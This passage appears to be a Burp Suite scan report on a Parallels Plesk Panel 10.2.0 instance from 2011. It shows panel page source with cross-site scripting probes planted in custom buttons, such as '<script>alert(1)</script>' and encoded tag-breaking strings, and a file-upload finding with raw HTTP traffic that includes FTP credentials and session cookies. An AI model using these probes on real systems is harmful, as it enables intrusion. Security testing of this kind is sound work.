items: [null,null,{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/site-aps_32.gif","title":"Applications","comment":"Install and manage web apps on your websites. Forums, photo galleries, collaboration tools, and many more installed in several clicks.","href":"\/app"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/file-manager_32.gif","title":"File Manager","comment":"Upload new files and work with current files and directories of your websites.","href":"\/web\/file-manager"},null,{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/web-stats_32.gif","title":"Web Statistics","comment":"View the reports on how your websites are visited: See how many people visited a site and which webpages they viewed.","handler":"function() { window.open(\"http:\/\/vulnerable.host.fqdn\/plesk-stat\/webstat\", \"_blank\", \"toolbar=yes,personalbar=yes,locationbar=>yes,status=yes,scrollbars=yes,resizable=yes,titlebar=yes,location=yes,width=700,height=500,innerWidth=700,innerHeight=500\"); return false; }"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/ftp-access_32.gif","title":"FTP Access","comment":"Set up access to files of your websites over FTP protocol.","href":"\/web\/ftp-access"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/dns_32.gif","title":"DNS Settings","comment":"Manage DNS zones for your domain names.","href":"\/web\/proxy\/type\/dns"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/certificates_32.gif","title":"SSL Certificates","comment":"Install an SSL certificate on a domain to secure data that your site visitors send to and receive from the site.","href":"\/web\/proxy\/type\/ssl-certificates"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/backup_32.gif","title":"Backup Manager","comment":"Back up and restore your domains, including settings and content of websites and mail accounts.","href":"\/web\/backup"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/hosting-setup_32.gif","title":"Web Hosting Settings","comment":"Manage the global hosting settings for all websites, and set up a password for access to the webspace for uploading files.","href":"\/web\/edit"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/big\/databases_32.gif","title":"Databases","comment":"Create and remove databases used by your websites, and manage them using integrated administrative web application.","href":"\/database\/list"},{"componentType":"Smb.ToolButton","href":"fdf080d9f1bbdb1b327620b2?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-ab12c6c0-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"<script>alert(1)<\/script>?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?%00ddf96<a>904a89e5ae2","icon":"\/images\/custom_buttons\/{0-abc54de0-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"cf063<a>01df0b1d826?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-bc2ea8c0-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"cf063%253ca%253e01df0b1d826?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-bd2637c0-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"%00cf063<a>01df0b1d826?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-be190400-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"_b4de2<a>3fcc30475f0?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-ca6d6340-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"_b4de2%253ca%253e3fcc30475f0?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-cb24ad20-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"_%00b4de2<a>3fcc30475f0?dom_id=1&dom_name=vulnerable.host.fqdn&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-cbdbf700-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"_c3316%2522%253e%253ca%253ee36b31545cd?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-d2e12520-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"_4d488%2522a%253d%2522b%2522c2595ff0661?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-d504a160-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"_4afbe%2522%2520a%253db%2520ca44d269b97?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"inject","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-d7281da0-8571-11e0-ac3a-06fe85596a87}","target":"_blank"},{"componentType":"Smb.ToolButton","href":"http:\/\/xss.cx?dom_id=1&dom_name=nosedivesailing.com&ftp_user=xsscx&ftp_pass=LL12345%2521%2521&cl_id=2&cname=Hoyt+LLC+Research&pname=Hoyt+LLC+Research&email=h02332%40gmail.com","title":"XSS.CX","comment":"will it take xss?","icon":"\/images\/custom_buttons\/{0-b51d93c0-8571-11e0-ac3a-06fe85596a87}","target":"_blank"}] }, {
componentType: 'Jsw.Panel',
id: 'advancedPanel',
title: 'Show Advanced Operations',
hideContentTitle: 'Hide Advanced Operations',
cls: 'tools-list-box operations-list-box',
hidden: true,
items: [{
componentType: 'Jsw.ListContainer',
cls: 'tools-list',
itemClass: 'tools-item',
emptyItemClass: 'tools-item-empty',
items: [{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/protected-dirs_16.gif","title":"Password-protected Directories","comment":"Restrict access to selected areas of your websites with password protection.","href":"\/web\/proxy\/type\/protected-dirs"},null,null,null,{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/maintenance-mode_16.gif","title":"Website Maintenance Mode","comment":"Switch a site off for maintenance and let the site visitors know that this is done on purpose and the site will be up soon.","href":"\/web\/proxy\/type\/maintenance-mode"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/copy_16.gif","title":"Website Copying","comment":"Copy website files to another site or external FTP storage.","href":"\/web\/proxy\/type\/copy"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/site-production_16.gif","title":"Learn How to Move a Site from Development to Production","comment":"View instructions on how to put an updated website into production.","href":"\/web\/site-production"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/how-to-clone-site_16.gif","title":"Learn How to Clone a Site to Development Environment","comment":"View instructions on how to clone the whole website (files, databases and applications).","href":"\/web\/how-to-clone-site"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/logs_16.gif","title":"Logs","comment":"View logs and configure recycling of log files.","href":"\/web\/proxy\/type\/logs"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/hotlink-prot_16.gif","title":"Hotlink Protection","comment":"Protect content of your websites from hotlinking.","href":"\/web\/proxy\/type\/hotlink-protection"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/web-dirs_16.gif","title":"Virtual Directories","comment":"Create and manage virtual directories for your websites.","href":"\/web\/proxy\/type\/web-dirs"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/band-limit_16.gif","title":"Bandwidth Limiting","comment":"Adjust the limit on bandwidth usage and connections to your websites.","href":"\/web\/proxy\/type\/bandwidth-limit"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/iis-app-pool_16.gif","title":"Dedicated IIS Application Pool for Your Websites","comment":"Set up a dedicated IIS application pool for serving websites associated with the currently selected subscription.","href":"\/web\/iis-app-pool"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/dom-aliases_16.gif","title":"Domain Aliases","comment":"View and manage alternative domain names for your websites.","href":"\/web\/proxy\/type\/domain-aliases"},{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/shared-ssl_16.gif","title":"Master SSL Domain","comment":"Use an SSL certificate associated with one of your websites for securing connections to other sites with the shared SSL service.","href":"\/web\/master-shared-ssl"},null,{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/web-users_16.gif","title":"Web Users","comment":"Set up accounts for users who can host personal web pages on your websites.","href":"\/web\/web-users"},null,{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/odbc-dc_16.gif","title":"ODBC Data Sources","comment":"Set up ODBC data sources.","href":"\/web\/proxy\/type\/odbc-data-sources"},null,{"componentType":"Smb.ToolButton","icon":"\/skins\/default\/img\/icons\/small\/asp-net-settings_16.gif","title":"ASP.NET Settings","comment":"Configure the settings of ASP.NET framework.","href":"\/web\/proxy\/type\/asp-net-settings"},null] }]
}]
});


new Jsw.Panel({
cls: 'list-box',
renderTo: 'main',

items: [
new Jsw.Hint({
hint: 'A website is a collection of related web pages, images, videos, and other files that are accessible by a common domain name. Here is a list of your websites, from which you can change website hosting settings, open a website directory in file manager, view statistics on website visits, install an SSL certificate, view web server logs, and change DNS zone settings.' }),

new Jsw.List({
id: 'sites-list',
searchable: false,
disabledSelectHint: 'The main domain name cannot be removed.',
data: {"pager":{"pageCount":1,"itemCountPerPage":25,"first":1,"current":1,"last":1,"pagesInRange":{"1":1},"firstPageInRange":1,"lastPageInRange":1,"currentItemCount":1,"totalItemCount":1,"firstItemNumber":1,"lastItemNumber":1},"state":{"sortField":"displayName","sortDirection":"up","currentPage":1,"itemsPerPage":25,"searchFilters":[],"forceShowSearch":false},"data":[{"mainDomain":true,"id":"d:1","domainId":1,"sortKey":"vulnerable.host.fqdn_","displayName":"nosedivesailing.com","statusInactive":null,"hostingType":"vrt_hst","webrootDir":"httpdocs","forwardingUrl":null,"changeHostingUrl":"\/web\/change-hosting\/id\/1","setupUrl":"\/web\/settings\/id\/1","filemanagerUrl":"\/web\/file-manager\/dir\/%2Fhttpdocs","sitebuilderUrl":"","sitebuilderLegacyUrl":null,"statisticsUrl":"window.open(\"http:\/\/vulnerable.host.fqdn\/plesk-stat\/webstat\", \"_blank\", \"toolbar=yes,personalbar=yes,locationbar=>yes,status=yes,scrollbars=yes,resizable=yes,titlebar=yes,location=yes,width=700,height=500,innerWidth=700,innerHeight=500\"); return false;","certificatesUrl":"\/web\/proxy\/type\/ssl-certificates\/id\/1","logsUrl":"\/web\/proxy\/type\/logs\/id\/1","dnsUrl":"\/web\/proxy\/type\/dns\/id\/1","previewUrl":"window.open(\"\/sitepreview\/http\/vulnerable.host.fqdn\/?randomHash=0a63ff134f4158a06e65ee63f5e1b0a6\", \"_blank\", \"toolbar=yes,personalbar=yes,locationbar=>yes,status=yes,scrollbars=yes,resizable=yes,titlebar=yes,location=yes,width=700,height=500,innerWidth=700,innerHeight=500\"); return false; ","maintenanceMode":false,"maintenanceModeUrl":"\/web\/maintenance-mode\/id\/1"}],"locale":{"recordsTotal":"%%total%% items total","pages":"Pages","firstPage":"First","lastPage":"Last","numberOfItemPerPage":"Number of entries per page","hideSearch":"Hide Search","showSearch":"Show Search","buttonSearch":"Search","buttonResetSearch":"Reset Search","noEntriesFound":"No items found.","itemsNotSelected":"Select items first.","messageBoxButtonYes":"Yes","messageBoxButtonNo":"No","messageBoxButtonOk":"OK","allItems":"All"}},
dataUrl: '/web/list-data',

isDisabledItem: function(item) {
return item.mainDomain;
},

columns: [
Jsw.list.COLUMN_SELECTION,
{
header: 'Domain',
sortable: true,
dataIndex: 'displayName',
renderer: function(item) {
var inactivitySign = item.statusInactive
? '<b>inactive</b>'
: '';

var link = '<a href="' + Jsw.baseUrl + item.setupUrl + '">'
+ item.displayName.escapeHTML() + '</a>';


if (item.mainDomain) {
link = '<strong class="primary-domain">' + link + '</strong>';
}

if (item.statusInactive) {
link = link
+ '<div class="hint-attention">'
+ 'Inactive' + '</div>';
}

if (item.maintenanceMode) {
link = link
+ '<div class="hint-attention">'
+ 'Switched off for maintenance.' + ' <a href="' + Jsw.baseUrl + item.maintenanceModeUrl + '">'
+ 'Change' + '</a>'
+ '</div>';
}

if (item.hostingType == 'subdomain') {
link = '<div class="level1">' + link + '</div>';
}

return link;
}
},
{
header: 'Hosting',
sortable: false,
renderer: function(item) {
var message = '';

if (item.hostingType == 'vrt_hst' || item.hostingType == 'subdomain') {

var webrootDir = item.webrootDir;

if (item.filemanagerUrl) {
webrootDir = '<a href="' + Jsw.baseUrl + item.filemanagerUrl + '">'
+ item.webrootDir
+ '</a>';
}

message = '<img src="' + Jsw.skinUrl + '/img/icons/small/website_16.gif"/>'
+ ' '
+ 'Website at' + ' '
+ webrootDir;

} else if (item.hostingType == 'none') {
message = '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" />'
+ '<em class="hint">' + 'No web hosting' + '</em>'
+ ' '
+ '<a href="' + Jsw.baseUrl + item.changeHostingUrl + '">['
+ 'add' + ']</a>';

} else if (item.hostingType == 'frm_fwd' || item.hostingType == 'std_fwd') {

message = '<img src="' + Jsw.skinUrl + '/img/icons/small/forward-to-dom_16.gif"/>'
+ ' '
+ 'Forward to' + ' '
+ '<a href="' + item.forwardingUrl + '">'
+ item.forwardingUrl
+ '</a>';
}

return message;
}
},
{
header: '',
cls: 'action-icon-set t-r',
renderer: function(item) {

var content = '';

content += !item.previewUrl
? '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" /> '
: '<span>'
+ '<span class="tooltipData">'
+ 'Preview the website in your browser. Note that some scripts and Flash animation used on the site might not work in the preview mode.' + '</span>'
+ '<a href="#" onclick=\'' + item.previewUrl + '\'>'
+ '<img src="' + Jsw.skinUrl + '/img/icons/small/preview_16.gif"/>'
+ '</a>'
+ '</span> ';

content += !item.filemanagerUrl
? '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" /> '
: '<span>'
+ '<span class="tooltipData">'
+ 'Go to website folder for managing files of the website.' + '</span>'
+ '<a href="' + Jsw.baseUrl + item.filemanagerUrl + '">'
+ '<img src="' + Jsw.skinUrl + '/img/icons/small/website-folder_16.gif"/>'
+ '</a>'
+ '</span> ';

if (item.hostingType != 'subdomain') {
content += !item.sitebuilderUrl
? '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" /> '
: '<span>'
+ '<span class="tooltipData">'
+ 'Edit the site in SiteBuilder.' + '</span>'
+ '<a href="' + Jsw.baseUrl + item.sitebuilderUrl + '" target="_blank">'
+ '<img src="' + Jsw.skinUrl + '/img/icons/small/sitebuilder_16.gif"/>'
+ '</a>'
+ '</span> ';
}
content += !item.sitebuilderLegacyUrl
? ''
: '<span>'
+ '<span class="tooltipData">'
+ 'Edit the site in SiteBuilder 4.5 (legacy).' + '</span>'
+ '<a href="' + item.sitebuilderLegacyUrl + '" target="_blank">'
+ '<img src="' + Jsw.skinUrl + '/img/icons/small/sitebuilder_16.gif"/>'
+ '</a>'
+ '</span> ';

if (item.hostingType == 'subdomain' && !item.sitebuilderLegacyUrl) {
content += '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" /> ';
}

content += !item.statisticsUrl
? '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" /> '
: '<span>'
+ '<span class="tooltipData">'
+ 'View website visits statistics.' + '</span>'
+ '<a href="#" onclick=\'' + item.statisticsUrl + '\'>'
+ '<img src="' + Jsw.skinUrl + '/img/icons/small/stats_16.gif"/>'
+ '</a>'
+ '</span> ';

content += !item.certificatesUrl
? '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" /> '
: '<span>'
+ '<span class="tooltipData">'
+ 'Secure the site with an SSL certificate.' + '</span>'
+ '<a href="' + Jsw.baseUrl + item.certificatesUrl + '">'
+ '<img src="' + Jsw.skinUrl + '/img/icons/small/ssl-cert_16.gif"/>'
+ '</a>'
+ '</span> ';

content += !item.logsUrl
? '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" /> '
: '<span>'
+ '<span class="tooltipData">'
+ 'View logs.' + '</span>'
+ '<a href="' + Jsw.baseUrl + item.logsUrl + '">'
+ '<img src="' + Jsw.skinUrl + '/img/icons/small/logs_16.gif"/>'
+ '</a>'
+ '</span> ';

content += !item.dnsUrl
? '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif" /> '
: '<span>'
+ '<span class="tooltipData">'
+ 'Change DNS zone settings.' + '</span>'
+ '<a href="' + Jsw.baseUrl + item.dnsUrl + '">'
+ '<img src="' + Jsw.skinUrl + '/img/icons/small/dns_16.gif"/>'
+ '</a>'
+ '</span> ';

return content;
}
}
],

operations: [
{
componentType: 'Jsw.SmallButton',
id: 'buttonAddDomain',
cls: 's-btn sb-new-domain',
title: 'Add New Domain',
description: 'Host a new website on this server, set up web forwarding to another website, or set up a domain DNS zone if you want to have only e-mail addresses under a domain name.',
handler: function() {
Jsw.redirect('/web/add-domain');
}
},
{
componentType: 'Jsw.SmallButton',
id: 'buttonAddSubDomain',
cls: 's-btn sb-new-subdomain',
title: 'Add New Subdomain',
description: 'Create a site addressed by a third-level domain name, like shop.example.com.',
handler: function() {
Jsw.redirect('/web/add-subdomain');
}
},
{
componentType: 'Jsw.bar.Separator'
},
{
componentType: 'Jsw.SmallButton',
id: 'buttonRegisterDomain',
cls: 's-btn sb-register-domain',
title: 'Register Domain Names',
description: 'Register domain names with a domain name registrar recommended by your provider.',
href: '/web/mpc-register-domain',
target: '_blank'
},
{
componentType: 'Jsw.SmallButton',
id: 'buttonManageDomains',
cls: 's-btn sb-manage-domains',
title: 'Manage Domain Names',
description: 'Manage domain names that you registered with your provider: Update registration information, specify name servers, and renew domain registration.',
href: '/web/mpc-manage-domains',
target: '_blank'
},
{
componentType: 'Jsw.bar.Separator'
},
{
componentType: 'Jsw.SmallButton',
id: 'buttonRemoveSite',
title: 'Remove',
description: 'Remove the selected sites and all their web content, including apps, and mail data.',
cls: 's-btn sb-remove-selected',
handler: function() {
Jsw.getComponent('sites-list').execGroupOperation({
url: '/web/delete/',
subtype: 'delete',
locale: {
confirmOnGroupOperation: 'Confirm that you want to remove the selected sites.' }
});
}
}],

onRedraw: function() {
$('sites-list').select('input[name="listCheckbox[]"]').each(function(checkbox) {
checkbox.observe('click', function() {
// if domain selected
if ('undefined' == typeof checkbox.up('tr').down('div.level1')) {
var nextRows = checkbox.up('tr').nextSiblings();
nextRows.each(function(rowElement) {
if ('undefined' == typeof rowElement.down('div.level1')) {
throw $break;
}
rowElement.down('input[name="listCheckbox[]"]').checked = checkbox.checked;
if (checkbox.checked) {
rowElement.addClassName('selected');
} else {
rowElement.removeClassName('selected');
}
});
} else {
var prevRows = checkbox.up('tr').previousSiblings();
prevRows.each(function(rowElement) {
if ('undefined' == typeof rowElement.down('div.level1')) {
if (!checkbox.checked) {
var parentCheckbox = rowElement.down('input[name="listCheckbox[]"]');
if (parentCheckbox) {
parentCheckbox.checked = false;
rowElement.removeClassName('selected');
}
}
throw $break;
}
});
}
});
});
}
})
]
});

});
//]]>
</script>

</div> <!-- /main -->

<div id="secondary">
</div>

</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

9. File upload functionality  previous  next
There are 5 instances of this issue:

Issue background

File upload functionality is commonly associated with a number of vulnerabilities, including:You should review the file upload functionality to understand its purpose, and establish whether uploaded content is ever returned to other application users, either through their normal usage of the application or by being fed a specific link by an attacker.

Some factors to consider when evaluating the security impact of this functionality include:

Issue remediation

File upload functionality is not straightforward to implement securely. Some recommendations to consider in the design of this functionality include:


9.1. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/custom-buttons/custom-button@2/properties/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/custom-buttons/custom-button@2/properties/

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

GET /plesk/client@2/custom-buttons/custom-button@2/properties/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/plesk/client@2/custom-buttons/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:21:01 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:21:01 GMT
Connection: close
Content-Length: 17825

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%252Fplesk%252Fclient%25402%252F%2F%3Fdst%3D%252Fplesk%252Fclient%25402%252Fcustom-buttons%252F%26src%3D%252Fsmb%252Faccount%26srcController%3DAccountController7bea8%25253c%25252fScRiPt%252520%25253ef9cde00af98' + '&activeModule=' + '' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
